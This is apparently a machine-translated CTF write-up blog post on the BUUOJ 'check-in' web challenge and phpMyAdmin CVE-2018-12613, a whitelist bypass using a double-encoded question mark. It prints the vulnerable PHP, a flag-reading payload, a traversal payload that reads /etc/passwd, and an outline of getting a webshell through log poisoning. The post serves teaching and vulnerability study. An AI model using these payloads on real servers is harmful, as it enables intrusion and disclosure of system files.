Recurring by Title CVE-2018-12613

Keywords: PHP phpMyAdmin IE SQL

File contains

Kongji, I first came into contact with this buuoj web check-in questions of

Enter the target and check the source code


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

Key points
Enter this php source

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

Focus again


    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

see

There's a train of thought.

As long as this judgment is used, the parameter file passed by the file will be executed, and any file will be included when possible.

When a file is imported, the user can control the referenced file name. Because the incoming file name has not been properly verified, or the verification has been bypassed, the unexpected file is operated, which may lead to unexpected file disclosure or even malicious code injection.

  • Look at the judgment in if again, the file parameter is not empty & & it is a string & & it is checked by the checkfile method. Go to the checkfill method.
public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }

Look, hint.php is on the white list!

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }


            
           

Enter hint.php to see a prompt like this
flag not here, and flag in ffffllllaaaagggg

Looking back at the previous condition, first there must be a string

(the function must return true to access the file)

if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;

Then judge whether the parameter is in the white list;

The function of mb_strpos() is to find the location of the first occurrence of a string in another string, that is? Position in previous string

mb_substr() is used to truncate the string.

Then compare it with the white list.
Repeat the above operation again.

This involves a hole in phpMyAdmin CVE-2018-12613. Because PHP will automatically urldecode once, when we submit% 253f (urlencode of urlencode), it will automatically convert to% 3F. if the condition is met,% 253f / will be considered as a directory, thus including. There is the following transformation

? --> %3f --> %253f

payload: file=hint.php%253f/.../.../.../.../.../.../.../ffffllllaaaagggg

About cve-2018-12613-PhpMyadmin stage contains

On June 19, 2018, phpmyadmin fixed a critical level vulnerability in the latest version

https://www.phpmyadmin.net/security/PMASA-2018-4/

The official vulnerability description is like this

An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially 
execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded 
within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the 
"$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, 
and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login 
requirement and runs the vulnerable code without any authentication).

The problem is in index.php's 55-63:

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

Here, there are 5 judgments about the parameters. You can Include files through Include if you pass the judgment.

The last two are the problems

$target_blacklist = array (
    'import.php', 'export.php'
);

as well as
Core::checkPageValidity($_REQUEST['target']):

The code is 443-476 in librariesclassesCore.php

    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

Look, this is almost the same as the code above

Then the white list verified by Kangkang

public static $goto_whitelist = array(
      'db_datadict.php',
      'db_sql.php',
      'db_events.php',
      'db_export.php',
      'db_importdocsql.php',
      'db_multi_table_query.php',
      'db_structure.php',
      'db_import.php',
      'db_operations.php',
      'db_search.php',
      'db_routines.php',
      'export.php',
      'import.php',
      'index.php',
      'pdf_pages.php',
      'pdf_schema.php',
      'server_binlog.php',
      'server_collations.php',
      'server_databases.php',
      'server_engines.php',
      'server_export.php',
      'server_import.php',
      'server_privileges.php',
      'server_sql.php',
      'server_status.php',
      'server_status_advisor.php',
      'server_status_monitor.php',
      'server_status_queries.php',
      'server_status_variables.php',
      'server_variables.php',
      'sql.php',
      'tbl_addfield.php',
      'tbl_change.php',
      'tbl_create.php',
      'tbl_import.php',
      'tbl_indexes.php',
      'tbl_sql.php',
      'tbl_export.php',
      'tbl_operations.php',
      'tbl_structure.php',
      'tbl_relation.php',
      'tbl_replace.php',
      'tbl_row_action.php',
      'tbl_select.php',
      'tbl_zoom_select.php',
      'transformation_overview.php',
      'transformation_wrapper.php',
      'user_password.php',
  );

After that, phpMyAdmin's development team took into account the situation of adding parameters after target, took out the front part of the question mark through string segmentation, continued to match the white list, and then repeated the action after a urldecode.

Get payload

target=db_datadict.php%253f/../../../../../../../../etc/passwd

Here again, we will analyze the specific causes of the loopholes in the bullshit file

  • Programmers usually write the reused function to a single file. When a function needs to be used, they call the file directly without writing it again. The process of file calling is generally called file containing.
  • They want the code to be more flexible, so they set the included files as variables for dynamic calls,
  • However, due to this flexibility, the client can call a malicious file, resulting in a File Inclusion Vulnerability.
  • Almost all scripting languages provide the function of file inclusion, but File Inclusion vulnerabilities are mostly in PHP Web Application, but very few in JSP, ASP, program, or even none, which is the drawback of its own language design (guess

Getshell

  • Upload picture GETshell
  • Read file, read php file
  • Include log file to get webshell
  1. First find the file location
    Have permission to read apache configuration file or / etc/init.d/httpd

Default location / var / log / httpd / access ﹐ log

  1. Let the log file insert php code
    When sending the url request, insert the php code. Generally, use the burp suite to grab the package and modify it

curl contract
Insert into get request or user agent section

  1. Include log files (must have permission to include)

Raise a chestnut.

if (isset($_GET[page])) {
include $_GET[page];
} else {
include "hint.PHP";
}

Where $_GET[page] allows the user to control variables. If there is no strict filtering, it will lead to loopholes

Code audit

Functions containing files

  • include()
  • include_once()
  • require()
  • require_once()

Reference link http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613

Posted by NoMansLand on Thu, 16 Apr 2020 05:20:39 -0700